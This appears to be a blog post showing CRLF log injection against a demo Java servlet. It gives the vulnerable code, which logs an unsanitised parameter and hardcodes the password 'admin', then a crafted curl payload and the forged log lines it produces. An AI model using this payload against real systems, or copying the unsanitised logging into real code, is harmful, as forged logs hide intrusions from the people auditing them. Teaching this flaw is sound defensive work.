CRLF injection in HTTP POST web application in Java Servlet

package com.bawi.servlet;

import org.apache.log4j.Logger;

import javax.servlet.RequestDispatcher;
import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.util.Date;

@WebServlet(urlPatterns = {"/do"})
public class MyServlet extends HttpServlet {
    private static final Logger LOGGER = Logger.getLogger(MyServlet.class);

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        resp.setContentType("text/plain;charset=UTF-8");
        ServletOutputStream out = resp.getOutputStream();

        String name = req.getParameter("name");
        LOGGER.info("Authenticating " + name);

        String pass = req.getParameter("pass");
        if ("admin".equals(pass)) {
            LOGGER.info("Successfully logged in");
            out.println("Successfully logged in");
        } else {
            LOGGER.info("Invalid credentials");
            out.println("Invalid credentials");
        }
    }
}
<project xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://maven.apache.org/POM/4.0.0"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>com.bawi</groupId>
    <artifactId>my-servlet</artifactId>
    <packaging>war</packaging>
    <version>0.1-SNAPSHOT</version>

    <properties>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    </properties>

    <build>
        <plugins>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-compiler-plugin</artifactId>
                <version>3.8.1</version>
                <configuration>
                    <source>1.8</source>
                    <target>1.8</target>
                </configuration>
            </plugin>

            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-war-plugin</artifactId>
                <version>3.3.1</version>
            </plugin>

            <plugin>
                <groupId>org.eclipse.jetty</groupId>
                <artifactId>jetty-maven-plugin</artifactId>
                <version>9.4.35.v20201120</version>
            </plugin>

        </plugins>
    </build>

    <dependencies>
        <dependency>
            <groupId>javax.servlet</groupId>
            <artifactId>javax.servlet-api</artifactId>
            <version>4.0.1</version>
            <scope>provided</scope>
        </dependency>

        <dependency>
            <groupId>log4j</groupId>
            <artifactId>log4j</artifactId>
            <version>1.2.17</version>
        </dependency>
    </dependencies>

</project>
me@MacBook:~$ curl -d "name=admin&pass=admin" -H "Content-Type: application/x-www-form-urlencoded" -X POST http://localhost:8080/do
Successfully logged in
me@MacBook:~$ curl -d "name=guest&pass=guest" -H "Content-Type: application/x-www-form-urlencoded" -X POST http://localhost:8080/do
Invalid credentials

logs:

2021-06-29 11:00:24 [INFO] MyServlet - Authenticating admin
2021-06-29 11:00:24 [INFO] MyServlet - Successfully logged in
2021-06-29 11:00:41 [INFO] MyServlet - Authenticating guest
2021-06-29 11:00:41 [INFO] MyServlet - Invalid credentials

POST with encoded CRLF %0A and %0D

me@MacBook:~$ curl -d "name=guest%0A%0D$(date '+%Y-%m-%d %H:%M:%S')%20%5BINFO%5D%20MyServlet%20-%20Successfully%20logged%20in%0A%0D$(date '+%Y-%m-%d %H:%M:%S')%20%5BINFO%5D%20MyServlet%20-%20Authenticating%20admin&pass=guest" -H "Content-Type: application/x-www-form-urlencoded" -X POST http://localhost:8080/do
Invalid credentials

tampered logs indicate as if guest logged in correctly but admin login failed:

2021-06-29 11:03:18 [INFO] MyServlet - Authenticating guest
2021-06-29 11:03:18 [INFO] MyServlet - Successfully logged in
2021-06-29 11:03:18 [INFO] MyServlet - Authenticating admin
2021-06-29 11:03:18 [INFO] MyServlet - Invalid credentials

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s